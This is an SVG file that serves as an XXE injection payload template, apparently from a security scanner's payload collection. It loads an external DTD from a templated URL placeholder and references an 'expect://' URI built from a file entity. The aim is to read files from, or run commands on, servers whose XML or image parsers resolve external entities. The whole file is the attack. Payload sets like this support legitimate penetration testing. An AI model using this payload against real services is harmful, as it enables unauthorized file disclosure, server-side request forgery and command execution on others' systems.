<!DOCTYPE svg [
    <!ENTITY % dtd SYSTEM "{{.}}">
    %dtd;
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <image xlink:href="expect://%file;" width="200" height="200"/>
</svg>
